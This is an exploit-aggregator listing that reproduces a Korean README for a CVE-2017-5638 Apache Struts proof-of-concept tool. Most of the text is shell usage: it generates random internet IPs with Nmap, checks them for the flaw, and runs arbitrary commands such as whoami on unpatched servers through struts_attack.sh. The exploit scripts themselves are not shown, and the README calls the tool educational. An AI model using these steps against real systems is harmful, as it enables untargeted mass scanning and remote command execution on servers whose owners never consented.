Sploitus

Exploit for CVE-2017-5638

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN84 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XHENDOS-CVE-2017-5638
# CVE-2017-5638

## λͺ©μ°¨

  1. κ°œμš”
  2. μ˜μ‘΄μ„±
  3. μ‚¬μš©λ²•



## κ°œμš”

이 ν”„λ‘œμ νŠΈλŠ” Apache Struts 취약점에 λŒ€ν•œ κ°œλ… 증λͺ…μž…λ‹ˆλ‹€. λͺ©ν‘œλŠ” μœ„μ—μ„œ μ„€λͺ…ν•œ 취약점에 λŒ€ν•΄ λ¬΄μž‘μœ„ IPλ₯Ό μƒμ„±ν•˜κ³  ν…ŒμŠ€νŠΈν•  수 μžˆλŠ” μ†Œν”„νŠΈμ›¨μ–΄λ₯Ό λ§Œλ“œλŠ” κ²ƒμ΄μ—ˆμŠ΅λ‹ˆλ‹€.

이 ν”„λ‘œμ νŠΈλŠ” 본인 μ±…μž„ ν•˜μ— ꡐ윑 λͺ©μ μœΌλ‘œλ§Œ μ‚¬μš©ν•˜μ‹­μ‹œμ˜€.

## μ˜μ‘΄μ„±

  * cURL

    * cURL은 νŠΉμ • 포트의 νŠΉμ • IP μ£Όμ†Œλ‘œ μ‘°μž‘λœ 헀더λ₯Ό μ „μ†‘ν•˜λŠ” 데 μ‚¬μš©λ©λ‹ˆλ‹€.
  * Nmap

    * Nmap은 80 λ˜λŠ” 443 ν¬νŠΈκ°€ μ—΄λ € μžˆλŠ” λ¬΄μž‘μœ„ IP μ£Όμ†Œλ₯Ό μƒμ„±ν•˜λŠ” 데 μ‚¬μš©λ©λ‹ˆλ‹€.



## μ‚¬μš©λ²•

**λ¬΄μž‘μœ„ IPλ₯Ό μƒμ„±ν•˜μ—¬ ν…μŠ€νŠΈ νŒŒμΌμ— μ €μž₯ν•©λ‹ˆλ‹€.**

root@kitploit:~
    
    
    ./get_ip.sh [μŠ€μΊ”ν•  호슀트 수] [μŠ€μΊ”ν•  포트] [좜λ ₯을 μ €μž₯ν•  파일 이름]
    

root@kitploit:~
    
    
    ./get_ip.sh 10000 80 output.txt
    

**νŠΉμ • IP μ£Όμ†Œμ— λŒ€ν•œ 취약점을 ν™•μΈν•©λ‹ˆλ‹€.**

root@kitploit:~
    
    
    ./struts_check.sh [ip μ£Όμ†Œ] [포트]
    

root@kitploit:~
    
    
    ./struts_check.sh 127.0.0.1 80
    

**IP μ£Όμ†Œ λͺ©λ‘μ— λŒ€ν•œ 취약점을 ν™•μΈν•©λ‹ˆλ‹€.**

root@kitploit:~
    
    
    ./main.sh [IP μ£Όμ†Œκ°€ ν¬ν•¨λœ ν…μŠ€νŠΈ 파일] [포트]
    

root@kitploit:~
    
    
    ./main.sh output.txt 443
    

**Apache Struts 취약점 νŒ¨μΉ˜κ°€ μ μš©λ˜μ§€ μ•Šμ€ μ„œλ²„μ—μ„œ λͺ…령을 μ‹€ν–‰ν•©λ‹ˆλ‹€.**

root@kitploit:~
    
    
    ./struts_attack.sh [IP μ£Όμ†Œ] [λͺ…λ Ή]
    

root@kitploit:~
    
    
    ./struts_attack.sh https://127.0.0.1 whoami